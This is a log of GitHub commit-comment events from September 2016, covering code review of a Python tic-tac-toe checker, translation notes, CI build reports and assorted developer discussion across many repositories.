{"id":"4572953996","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19051052,"position":10,"line":10,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T09:09:37Z","updated_at":"2016-09-16T09:09:37Z","body":"Since `check_win()` returns `None` for the negative case, this should have been\r\n```python\r\nif check_win(row, 'X'):\r\n     return 'X'\r\n```"}},"created_at":"2016-09-16T09:09:37Z"}
{"id":"4572960075","type":"CommitCommentEvent","actor":{"login":"kleinee"},"repo":{"name":"forrestfiller/jns"},"payload":{"comment":{"id":19051071,"position":null,"line":null,"path":null,"commit_id":"e600474fd713e30cf140b2c49b44c673629326df","created_at":"2016-09-16T09:11:05Z","updated_at":"2016-09-16T09:11:05Z","body":"I wholeheartedly agree. Did you succeed?"}},"created_at":"2016-09-16T09:11:05Z"}
{"id":"4572969020","type":"CommitCommentEvent","actor":{"login":"Viper2k4"},"repo":{"name":"StoneOffStones/plugin.video.xstream"},"payload":{"comment":{"id":19051093,"position":null,"line":null,"path":null,"commit_id":"fe14407aba3dc9ba0892c350c22078421a26fe01","created_at":"2016-09-16T09:13:13Z","updated_at":"2016-09-16T09:13:13Z","body":"Ich habe keine Hilfsmittel verwendet. Einfach mit Pain.net geöffnet und gespeichert^^ (paint hatte das gleich ergebniss)"}},"created_at":"2016-09-16T09:13:13Z"}
{"id":"4572969365","type":"CommitCommentEvent","actor":{"login":"prabhjyotsingh"},"repo":{"name":"apache/zeppelin"},"payload":{"comment":{"id":19051094,"position":34,"line":57,"path":"zeppelin-web/src/app/interpreter/interpreter.controller.js","commit_id":"21a084b170b29dee0f2d57aae22b00c785ef0c8e","created_at":"2016-09-16T09:13:18Z","updated_at":"2016-09-16T09:13:18Z","body":"Yes, its not exactly polling, but it calls `getInterpreterSettings()` which does a `$http.get(baseUrlSrv.getRestApiBase() + '/interpreter/setting')` which on success calls `checkDownloadingDependencies()` until `isDownloading` is true in a recursive way, is it not happening in your case ? \r\n\r\nI see below screenshot in my developer console until download is complete or you move out from this(#/interpreter) page.\r\n![Uploading Screen Shot 2016-09-16 at 2.38.57 PM.png…]()\r\n "}},"created_at":"2016-09-16T09:13:18Z"}
{"id":"4572971423","type":"CommitCommentEvent","actor":{"login":"s3inlc"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":19051101,"position":20,"line":20,"path":"src/org/vitrivr/cineast/art/modules/VisualizationAverageColorGrid8Vertical.java","commit_id":"5c9b5428860009c3be0df59cdc37dde79c18fafc","created_at":"2016-09-16T09:13:48Z","updated_at":"2016-09-16T09:13:48Z","body":"It was some sort of testing how it would look when resized to the aspect ratio of the original segment.\r\nI'm not sure, is it possible that a 8x8 pixels image can be resized to another aspect ration (16:9 in this case) without having a blur effect?"}},"created_at":"2016-09-16T09:13:48Z"}
{"id":"4572974849","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19051139,"position":17,"line":17,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T09:14:36Z","updated_at":"2016-09-16T09:14:36Z","body":"This is a bad name. While you don't actually need a temporary string, even if you did, this one is not temporary since you actually evaluate its final value directly."}},"created_at":"2016-09-16T09:14:36Z"}
{"id":"4572977328","type":"CommitCommentEvent","actor":{"login":"JulienHellio"},"repo":{"name":"ploufppe/ppe"},"payload":{"comment":{"id":19051141,"position":323,"line":1,"path":"PPE_Julien/ppe_1.6.6/ac12update.php","commit_id":"cf7ee2d714a47ce7053cb1f420073bc8e74d355b","created_at":"2016-09-16T09:15:12Z","updated_at":"2016-09-16T09:15:12Z","body":"retry again ;)"}},"created_at":"2016-09-16T09:15:12Z"}
{"id":"4572977433","type":"CommitCommentEvent","actor":{"login":"Airborn22"},"repo":{"name":"Airborn22/vakvarju"},"payload":{"comment":{"id":19051142,"position":null,"line":null,"path":null,"commit_id":"95eb1cebeddb484d31dc4338917a1c66155ae3a6","created_at":"2016-09-16T09:15:13Z","updated_at":"2016-09-16T09:15:13Z","body":"![Szeptember 16. - Péntek](http://ujlipot.vakvarju.com/data/napimenu/24.jpg?v=1473664787)\nTejszínes parajkrémleves sajtos omlettel\r\nRántott camembert áfonyalekvárral, jázmin rizzsel\r\nSajttorta"}},"created_at":"2016-09-16T09:15:13Z"}
{"id":"4572983484","type":"CommitCommentEvent","actor":{"login":"hnakamur"},"repo":{"name":"tenforward/linuxcontainers.org"},"payload":{"comment":{"id":19051154,"position":21,"line":21,"path":"content/lxd/news.ja.md","commit_id":"5b418cad9973d8db4728a2a4e1b67a9e6eb2fb32","created_at":"2016-09-16T09:16:39Z","updated_at":"2016-09-16T09:16:39Z","body":"他と合わせる意味では `再帰的なファイルの push/pull ができるようになりました` のように `ができるようになりました` があったほうが良い気がします。"}},"created_at":"2016-09-16T09:16:39Z"}
{"id":"4572983841","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19051156,"position":null,"line":null,"path":null,"commit_id":"10e34c5f35b71410cee7de6cdec5d1dc63c1379a","created_at":"2016-09-16T09:16:45Z","updated_at":"2016-09-16T09:16:45Z","body":"ASIHPValidation (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1764 of 1764 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.15%25-green.svg)</a>\n"}},"created_at":"2016-09-16T09:16:45Z"}
{"id":"4572983916","type":"CommitCommentEvent","actor":{"login":"edgarreis"},"repo":{"name":"edgarreis/JS-MQTT-monitor"},"payload":{"comment":{"id":19051157,"position":null,"line":null,"path":null,"commit_id":"a9b0d0b6d322d081451b9ea431afc26d45e8245b","created_at":"2016-09-16T09:16:46Z","updated_at":"2016-09-16T09:16:46Z","body":"up"}},"created_at":"2016-09-16T09:16:46Z"}
{"id":"4572986480","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19051167,"position":3,"line":3,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T09:17:23Z","updated_at":"2016-09-16T09:17:23Z","body":"Or, since you bother to `.upper()` all the input string in any case:\r\n```python\r\nrows = [row.strip().upper() for row in rows]\r\n```\r\nwould have saved you a whole bunch of `upper()` calls."}},"created_at":"2016-09-16T09:17:23Z"}
{"id":"4572988543","type":"CommitCommentEvent","actor":{"login":"tenforward"},"repo":{"name":"tenforward/linuxcontainers.org"},"payload":{"comment":{"id":19051170,"position":21,"line":21,"path":"content/lxd/news.ja.md","commit_id":"5b418cad9973d8db4728a2a4e1b67a9e6eb2fb32","created_at":"2016-09-16T09:17:51Z","updated_at":"2016-09-16T09:17:51Z","body":"そうですね!! :smile: "}},"created_at":"2016-09-16T09:17:51Z"}
{"id":"4572992843","type":"CommitCommentEvent","actor":{"login":"zhaoxile"},"repo":{"name":"MikuAuahDark/NPPS"},"payload":{"comment":{"id":19051177,"position":null,"line":null,"path":null,"commit_id":"b86dfb7cd10a05c268173183d03916763078924e","created_at":"2016-09-16T09:18:53Z","updated_at":"2016-09-16T09:18:53Z","body":"Sure\r\nApache 2.4 + PHP 7.0.10 + Mysql 5.7.3 , and the sqlite3 uses php7.0.10 built-in"}},"created_at":"2016-09-16T09:18:53Z"}
{"id":"4572992983","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19051178,"position":29,"line":29,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T09:18:55Z","updated_at":"2016-09-16T09:18:55Z","body":"All of these checking steps would have benefited from a comment at the top explaining what you're checking."}},"created_at":"2016-09-16T09:18:55Z"}
{"id":"4572996712","type":"CommitCommentEvent","actor":{"login":"hnakamur"},"repo":{"name":"tenforward/linuxcontainers.org"},"payload":{"comment":{"id":19051183,"position":38,"line":38,"path":"content/lxd/news.ja.md","commit_id":"5b418cad9973d8db4728a2a4e1b67a9e6eb2fb32","created_at":"2016-09-16T09:19:48Z","updated_at":"2016-09-16T09:19:48Z","body":"`\"restart\" を` の前に `forceオプションを指定せずに` を追加したほうが良いと思います。\r\nforceを指定すれば pause されたコンテナでも restart できるということですよね？\r\nforceなしの場合はrestartしようとするとエラーになると。"}},"created_at":"2016-09-16T09:19:48Z"}
{"id":"4573001570","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19051186,"position":38,"line":38,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T09:20:58Z","updated_at":"2016-09-16T09:20:58Z","body":"You're repeating the work from checking the same diagonal above. Could have constructed it once and then checked it once for 'X' and once for 'O'."}},"created_at":"2016-09-16T09:20:58Z"}
{"id":"4573007827","type":"CommitCommentEvent","actor":{"login":"comag"},"repo":{"name":"comag/enigma2-openpli-fulan"},"payload":{"comment":{"id":19051231,"position":null,"line":null,"path":null,"commit_id":"3664a3453e75852c3b301428b5bf6939e05c1ee5","created_at":"2016-09-16T09:22:32Z","updated_at":"2016-09-16T09:22:32Z","body":"enigma2: update italian translations by Eragon "}},"created_at":"2016-09-16T09:22:32Z"}
{"id":"4573007901","type":"CommitCommentEvent","actor":{"login":"jonfreedman"},"repo":{"name":"symphonyoss/hubot-symphony"},"payload":{"comment":{"id":19051232,"position":null,"line":null,"path":null,"commit_id":"c13b1feea823297fe1d7ca20cd52633461c7dd50","created_at":"2016-09-16T09:22:33Z","updated_at":"2016-09-16T09:22:33Z","body":"Fixes #12"}},"created_at":"2016-09-16T09:22:33Z"}
{"id":"4573009961","type":"CommitCommentEvent","actor":{"login":"Eilhart"},"repo":{"name":"AliceCA/Overchan-Android"},"payload":{"comment":{"id":19051241,"position":null,"line":null,"path":null,"commit_id":"128e9cc686569396df2fa697674128f78f873b22","created_at":"2016-09-16T09:23:02Z","updated_at":"2016-09-16T09:23:02Z","body":"Overchan doesn't support /mega/ and /random/ overboard pages."}},"created_at":"2016-09-16T09:23:02Z"}
{"id":"4573011042","type":"CommitCommentEvent","actor":{"login":"shipperizer"},"repo":{"name":"oii/ogre"},"payload":{"comment":{"id":19051242,"position":69,"line":69,"path":"ogreclient/dist/vagrant-windows/OGRE/OgreClientService/OgreWrapper.cs","commit_id":"0382191baddd5eda889c3d2c093eb3b38da5d21e","created_at":"2016-09-16T09:23:16Z","updated_at":"2016-09-16T09:23:16Z","body":"please remove comments...they are confusing....."}},"created_at":"2016-09-16T09:23:16Z"}
{"id":"4573013464","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19051245,"position":16,"line":16,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T09:23:50Z","updated_at":"2016-09-16T09:23:50Z","body":"Since you use `len(temp_list)` very often, would have been a good idea to put a\r\n```python\r\nn = len(temp_list)\r\n```\r\nat the top of this function."}},"created_at":"2016-09-16T09:23:50Z"}
{"id":"4573019205","type":"CommitCommentEvent","actor":{"login":"tenforward"},"repo":{"name":"tenforward/linuxcontainers.org"},"payload":{"comment":{"id":19051255,"position":38,"line":38,"path":"content/lxd/news.ja.md","commit_id":"5b418cad9973d8db4728a2a4e1b67a9e6eb2fb32","created_at":"2016-09-16T09:25:10Z","updated_at":"2016-09-16T09:25:10Z","body":"おっと失礼しました。`lxc help restart` としても何も出てこなかったので無視してたのですが、`lxc restart --help` で `--force` が出てきました :sweat_smile: 追加しておきます。"}},"created_at":"2016-09-16T09:25:10Z"}
{"id":"4573024627","type":"CommitCommentEvent","actor":{"login":"satya164"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19051279,"position":9,"line":106,"path":"Libraries/Interaction/InteractionManager.js","commit_id":"3b5e4cc59331b49d2ab8cf2fed74dabd2251fe9c","created_at":"2016-09-16T09:26:22Z","updated_at":"2016-09-16T09:26:22Z","body":"Isn't this going to always warn in OSS. Will be annoying IMO."}},"created_at":"2016-09-16T09:26:22Z"}
{"id":"4573026265","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19051334,"position":4,"line":4,"path":"checker_unit_test.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T09:26:46Z","updated_at":"2016-09-16T09:26:46Z","body":"You're missing tests for at least a couple of cases where there is *no* winner."}},"created_at":"2016-09-16T09:26:46Z"}
{"id":"4573031726","type":"CommitCommentEvent","actor":{"login":"rajeevrz"},"repo":{"name":"rajeevrz/heroku_test"},"payload":{"comment":{"id":19051349,"position":null,"line":null,"path":null,"commit_id":"31c010533b87910bd8104c1d6f4d8796bffee146","created_at":"2016-09-16T09:27:59Z","updated_at":"2016-09-16T09:27:59Z","body":"ok"}},"created_at":"2016-09-16T09:27:59Z"}
{"id":"4573032824","type":"CommitCommentEvent","actor":{"login":"niiisja"},"repo":{"name":"VebjornBM/Oblig-1-GEO2311-VHR"},"payload":{"comment":{"id":19051350,"position":4,"line":8,"path":"teori_wms.html","commit_id":"98f4d8df2a336325c4140c7fdec04011fde03a81","created_at":"2016-09-16T09:28:14Z","updated_at":"2016-09-16T09:28:14Z","body":"Haha lol\r\n"}},"created_at":"2016-09-16T09:28:14Z"}
{"id":"4573034107","type":"CommitCommentEvent","actor":{"login":"chrism333"},"repo":{"name":"chrism333/yalla"},"payload":{"comment":{"id":19051353,"position":20,"line":93,"path":"include/yalla/device/atmega8/avr/io.hpp","commit_id":"b19472b48a16609b4eec4342cf20f00c9190f170","created_at":"2016-09-16T09:28:33Z","updated_at":"2016-09-16T09:28:33Z","body":"That's pretty cool stuff @jypma! Independent of how you want to move on with your own AvrLib, I'm thinking if it would make sense to create a small framework for this low level stuff. I mean something that provides the register types of yalla as well as your interrupt mechanism and maybe some more stuff like pins. We wouldn't need to target a specific architecture at this level, but could also provide actual interrupt and register definitions for some platforms. This framework could then be used in other projects that add a HAL on top of it, like your AvrLib or xpcc. \r\n\r\nWhat do you guys think?"}},"created_at":"2016-09-16T09:28:33Z"}
{"id":"4573034734","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19051354,"position":7,"line":7,"path":"checker_unit_test.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T09:28:41Z","updated_at":"2016-09-16T09:28:41Z","body":"This makes the test case hard to read.\r\nBetter would have been something like:\r\n```python\r\nboard = \"\"\"\r\nXXX\r\nOO.\r\n...\r\n\"\"\".strip().splitlines()\r\n```"}},"created_at":"2016-09-16T09:28:41Z"}
{"id":"4573036776","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19051357,"position":31,"line":31,"path":"checker_unit_test.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T09:29:09Z","updated_at":"2016-09-16T09:29:09Z","body":"Good job validating your input parsing as well."}},"created_at":"2016-09-16T09:29:09Z"}
{"id":"4573052790","type":"CommitCommentEvent","actor":{"login":"Soranela"},"repo":{"name":"yokrysty/LoLAccountChecker"},"payload":{"comment":{"id":19051429,"position":null,"line":null,"path":null,"commit_id":"727412ce4bd41c12ac1f6d2fabc5c75f53b34034","created_at":"2016-09-16T09:32:51Z","updated_at":"2016-09-16T09:32:51Z","body":"Hey, any known problem with PBE Server? I had a 150 Account JSON , sold like 60 of them , wanted to uncheck them and see which ID+PW Combo is working and it doesn't work, it will simply stop and the status is \"unchecked\" no error, anyone care to help me?"}},"created_at":"2016-09-16T09:32:51Z"}
{"id":"4573057741","type":"CommitCommentEvent","actor":{"login":"toopy"},"repo":{"name":"ansible/ansible-modules-core"},"payload":{"comment":{"id":19051443,"position":31,"line":596,"path":"source_control/git.py","commit_id":"e4f40d1cdda9161849098bfeac9d360fe9dd77f3","created_at":"2016-09-16T09:34:06Z","updated_at":"2016-09-16T09:34:06Z","body":"This was not updated in this commit: https://github.com/ansible/ansible-modules-core/commit/e4f40d1cdda9161849098bfeac9d360fe9dd77f3#diff-a849364995015699e9e0f01542e3155cR427\r\n\r\n.. then we have the following error:\r\n\r\n```python\r\nTraceback (most recent call last):\r\n  File \"/tmp/ansible_4yCkD9/ansible_module_git.py\", line 1022, in <module>\r\n    main()\r\n  File \"/tmp/ansible_4yCkD9/ansible_module_git.py\", line 962, in main\r\n    diff = get_diff(module, git_path, dest, repo, remote, depth, bare, result['before'], result['after'])\r\n  File \"/tmp/ansible_4yCkD9/ansible_module_git.py\", line 427, in get_diff\r\n    fetch(git_path, module, repo, dest, after, remote, depth, bare, '')\r\nTypeError: fetch() takes exactly 10 arguments (9 given)\r\n```"}},"created_at":"2016-09-16T09:34:06Z"}
{"id":"4573064244","type":"CommitCommentEvent","actor":{"login":"chriskinch"},"repo":{"name":"chriskinch/gigwave"},"payload":{"comment":{"id":19051453,"position":4,"line":4,"path":"js/src/loader.js","commit_id":"e2167498c69701baddbf70217a43d76189c9604e","created_at":"2016-09-16T09:35:37Z","updated_at":"2016-09-16T09:35:37Z","body":"Testing a code comment"}},"created_at":"2016-09-16T09:35:37Z"}
{"id":"4573066103","type":"CommitCommentEvent","actor":{"login":"jypma"},"repo":{"name":"chrism333/yalla"},"payload":{"comment":{"id":19051457,"position":20,"line":93,"path":"include/yalla/device/atmega8/avr/io.hpp","commit_id":"b19472b48a16609b4eec4342cf20f00c9190f170","created_at":"2016-09-16T09:36:03Z","updated_at":"2016-09-16T09:36:03Z","body":"I'd definitely be :+1: on the direction, but my ability to invest time is ... ehm ... fluctuating at best :-)\r\n\r\nBut while we're boasting features anyways, another thing from AvrLib that would be worth mentioning is its compile-time duration framework. You can statically inform the compiler of the prescaler for a timer, and it'll then compile-time convert expressions like `10_s` down to `60_us` into appropriate integers, already premultiplied in real timer units. That has some huge advantages:\r\n- Compilation breaks if your time expression is too small for the prescaler (would round to 0 or 1)\r\n- Compilation breaks if your time expression doesn't fit the `int_t` you're trying to put it into\r\n- And of course saves CPU cycles calculating something that's already known at compile time\r\n\r\nI've seen plenty of bugs for both of the above, that's why I decided to get the compile-time safety where possible."}},"created_at":"2016-09-16T09:36:03Z"}
{"id":"4573070944","type":"CommitCommentEvent","actor":{"login":"lucaro"},"repo":{"name":"silvanheller/cineast"},"payload":{"comment":{"id":19051466,"position":20,"line":20,"path":"src/org/vitrivr/cineast/art/modules/VisualizationAverageColorGrid8Vertical.java","commit_id":"5c9b5428860009c3be0df59cdc37dde79c18fafc","created_at":"2016-09-16T09:37:11Z","updated_at":"2016-09-16T09:37:11Z","body":"Sure, just resize with nearest neighbor interpolation."}},"created_at":"2016-09-16T09:37:11Z"}
{"id":"4573080895","type":"CommitCommentEvent","actor":{"login":"davidaurelio"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19051503,"position":null,"line":null,"path":null,"commit_id":"24736d11880f5f64d64a3274f1d80cfe51950a47","created_at":"2016-09-16T09:39:31Z","updated_at":"2016-09-16T09:39:31Z","body":"Thank you. It will still take some time, but it’s coming."}},"created_at":"2016-09-16T09:39:31Z"}
{"id":"4573085278","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19051512,"position":null,"line":null,"path":null,"commit_id":"10e34c5f35b71410cee7de6cdec5d1dc63c1379a","created_at":"2016-09-16T09:40:34Z","updated_at":"2016-09-16T09:40:34Z","body":"ASIHPValidation (Myoldmopar) - Win64-Windows-7-VisualStudio-12: OK (2335 of 2336 tests passed, 0 test warnings)\n\n * 1 test had: EIO diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: Table big diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-10e34c5f35b71410cee7de6cdec5d1dc63c1379a-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T09:40:34Z"}
{"id":"4573088286","type":"CommitCommentEvent","actor":{"login":"glestaris"},"repo":{"name":"fouralarmfire/grootsay"},"payload":{"comment":{"id":19051516,"position":52,"line":42,"path":"processor/processor.go","commit_id":"4112ca868b1ff6cbb5c014fe9e531f24ccebdf61","created_at":"2016-09-16T09:41:18Z","updated_at":"2016-09-16T09:41:18Z","body":"this is a buuuuuuuuuuuuuuuuuug!"}},"created_at":"2016-09-16T09:41:18Z"}
{"id":"4573089496","type":"CommitCommentEvent","actor":{"login":"glestaris"},"repo":{"name":"fouralarmfire/grootsay"},"payload":{"comment":{"id":19051520,"position":52,"line":42,"path":"processor/processor.go","commit_id":"4112ca868b1ff6cbb5c014fe9e531f24ccebdf61","created_at":"2016-09-16T09:41:33Z","updated_at":"2016-09-16T09:41:33Z","body":"FIXME FIXME FIXME FIXME FIXME FIXME FIXME FIXME"}},"created_at":"2016-09-16T09:41:33Z"}
{"id":"4573094018","type":"CommitCommentEvent","actor":{"login":"VishnuJayan6"},"repo":{"name":"VishnuJayan6/project"},"payload":{"comment":{"id":19051542,"position":1,"line":1,"path":"lesson_3_reflection.txt","commit_id":"540066908a3861352381e3bc9fa64937ae94f7f2","created_at":"2016-09-16T09:42:37Z","updated_at":"2016-09-16T09:42:37Z","body":"When would you want to use a remote repository rather than keeping all your work\r\nlocal?\r\n\r\n    Fill in your answer here\r\n\r\nWhy might you want to always pull changes manually rather than having Git\r\nautomatically stay up-to-date with your remote repository?\r\n\r\n    Fill in your answer here\r\n\r\nDescribe the differences between forks, clones, and branches.  When would you\r\nuse one instead of another?\r\n\r\n    Fill in your answer here\r\n\r\nWhat is the benefit of having a copy of the last known state of the remote\r\nstored locally?\r\n\r\n    Fill in your answer here\r\n\r\nHow would you collaborate without using Git or GitHub?  What would be easier,\r\nand what would be harder?\r\n\r\n    Fill in your answer here\r\n\r\nWhen would you want to make changes in a separate branch rather than directly in\r\nmaster?  What benefits does each approach have?\r\n\r\n    Fill in your answer here"}},"created_at":"2016-09-16T09:42:37Z"}
{"id":"4573094304","type":"CommitCommentEvent","actor":{"login":"fouralarmfire"},"repo":{"name":"fouralarmfire/grootsay"},"payload":{"comment":{"id":19051544,"position":52,"line":42,"path":"processor/processor.go","commit_id":"4112ca868b1ff6cbb5c014fe9e531f24ccebdf61","created_at":"2016-09-16T09:42:41Z","updated_at":"2016-09-16T09:42:41Z","body":"fuck off george"}},"created_at":"2016-09-16T09:42:41Z"}
{"id":"4573102385","type":"CommitCommentEvent","actor":{"login":"vovkkk"},"repo":{"name":"aziz/SublimeFileBrowser"},"payload":{"comment":{"id":19051560,"position":null,"line":null,"path":null,"commit_id":"1f74eda6fdb8917f87755625be61cf1842634833","created_at":"2016-09-16T09:44:32Z","updated_at":"2016-09-16T09:44:32Z","body":"Package Control is supposed to pick the latest tag https://github.com/aziz/SublimeFileBrowser/releases\r\nI probably may add new tag now, but want to review stuff just in case, so tomorrow."}},"created_at":"2016-09-16T09:44:32Z"}
{"id":"4573104187","type":"CommitCommentEvent","actor":{"login":"RichiH"},"repo":{"name":"prometheus/snmp_exporter"},"payload":{"comment":{"id":19051564,"position":70,"line":202,"path":"collector.go","commit_id":"3f5b5408c825d1c9fa9e5ddf0cd1798389885a9f","created_at":"2016-09-16T09:44:57Z","updated_at":"2016-09-16T09:44:57Z","body":"This is half a comment and half a understanding question. Isn't this the perfect place for an error counter and an `Errorf`?"}},"created_at":"2016-09-16T09:44:57Z"}
{"id":"4573109367","type":"CommitCommentEvent","actor":{"login":"tdroxler"},"repo":{"name":"tdroxler/sarsi"},"payload":{"comment":{"id":19051573,"position":35,"line":58,"path":"sarsi.cabal","commit_id":"84c1974ab176f54c92aac94d6b49bf1f505e2b83","created_at":"2016-09-16T09:45:54Z","updated_at":"2016-09-16T09:45:54Z","body":"yep, it was when quickly trying to implement aeson for algebraic data type https://www.schoolofhaskell.com/user/Geraldus/algebraic-data-types-adts-with-aeson maybe you got a better refference, it seems to be a lot of boilerplate."}},"created_at":"2016-09-16T09:45:54Z"}
{"id":"4573111730","type":"CommitCommentEvent","actor":{"login":"lorenzhs"},"repo":{"name":"lorenzhs/thrill"},"payload":{"comment":{"id":19051577,"position":null,"line":null,"path":null,"commit_id":"891d0957450431a4abcb47d00b9142a4d7bd84e0","created_at":"2016-09-16T09:46:25Z","updated_at":"2016-09-16T09:46:25Z","body":"@bingmann the generality and extensability of reduce operations can be quite aggravating at times. WAAAH."}},"created_at":"2016-09-16T09:46:25Z"}
{"id":"4573114006","type":"CommitCommentEvent","actor":{"login":"tumbili"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":19051581,"position":null,"line":null,"path":null,"commit_id":"900026818b772ef848749e366b722817b3fc6fc4","created_at":"2016-09-16T09:46:57Z","updated_at":"2016-09-16T09:46:57Z","body":"@CarloWood One thing it does is disabling auto completion for the make command for px4fmu targets :-)"}},"created_at":"2016-09-16T09:46:57Z"}
{"id":"4573117819","type":"CommitCommentEvent","actor":{"login":"KevinPan"},"repo":{"name":"ServiceStack/ServiceStack.OrmLite"},"payload":{"comment":{"id":19051589,"position":null,"line":null,"path":null,"commit_id":"7408157b39c019c7456324258db52addd0f3f74c","created_at":"2016-09-16T09:47:51Z","updated_at":"2016-09-16T09:47:51Z","body":"Will the update methods in this class support for RowVersion check?"}},"created_at":"2016-09-16T09:47:51Z"}
{"id":"4573120311","type":"CommitCommentEvent","actor":{"login":"excetara2"},"repo":{"name":"aziz/SublimeFileBrowser"},"payload":{"comment":{"id":19051593,"position":null,"line":null,"path":null,"commit_id":"1f74eda6fdb8917f87755625be61cf1842634833","created_at":"2016-09-16T09:48:27Z","updated_at":"2016-09-16T09:48:27Z","body":"Okay no worries. I just noticed that quick preview still wasn't working but\nyeah probably a good idea. But didn't notice any other errors yet..\n\nOn Fri, Sep 16, 2016 at 7:44 PM Vova Kolobok <notifications@github.com>\nwrote:\n\n> Package Control is supposed to pick the latest tag\n> https://github.com/aziz/SublimeFileBrowser/releases\n> I probably may add new tag now, but want to review stuff just in case, so\n> tomorrow.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/aziz/SublimeFileBrowser/commit/1f74eda6fdb8917f87755625be61cf1842634833#commitcomment-19051560>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAtO1kpGE_Zzu30LGty8qI_cR9s13Dwnks5qqmUBgaJpZM4J-sKx>\n> .\n>\n"}},"created_at":"2016-09-16T09:48:27Z"}
{"id":"4573121313","type":"CommitCommentEvent","actor":{"login":"bingmann"},"repo":{"name":"lorenzhs/thrill"},"payload":{"comment":{"id":19051594,"position":null,"line":null,"path":null,"commit_id":"891d0957450431a4abcb47d00b9142a4d7bd84e0","created_at":"2016-09-16T09:48:43Z","updated_at":"2016-09-16T09:48:43Z","body":"Sorry for building general purpose software. Those are now 11 template parameters."}},"created_at":"2016-09-16T09:48:43Z"}
{"id":"4573121546","type":"CommitCommentEvent","actor":{"login":"ITASAPI"},"repo":{"name":"ITASAPI/ITASAPI-v2.7"},"payload":{"comment":{"id":19051596,"position":null,"line":null,"path":null,"commit_id":"8f7dbd9ebfe7f25ddb1f2dffb8b46d67f9817272","created_at":"2016-09-16T09:48:47Z","updated_at":"2016-09-16T09:48:47Z","body":"__API Description file syntax error on line 3161__: base type 'array MasterData' is not defined in the document (Autogenerated message from apiary.io)"}},"created_at":"2016-09-16T09:48:47Z"}
{"id":"4573124972","type":"CommitCommentEvent","actor":{"login":"jifeon"},"repo":{"name":"redco/goose-proxy-rotator"},"payload":{"comment":{"id":19051603,"position":1,"line":1,"path":"Dockerfile","commit_id":"5ee433508ab3000467c8236532c6a80436ca2dd5","created_at":"2016-09-16T09:49:34Z","updated_at":"2016-09-16T09:49:34Z","body":"why not 6?"}},"created_at":"2016-09-16T09:49:34Z"}
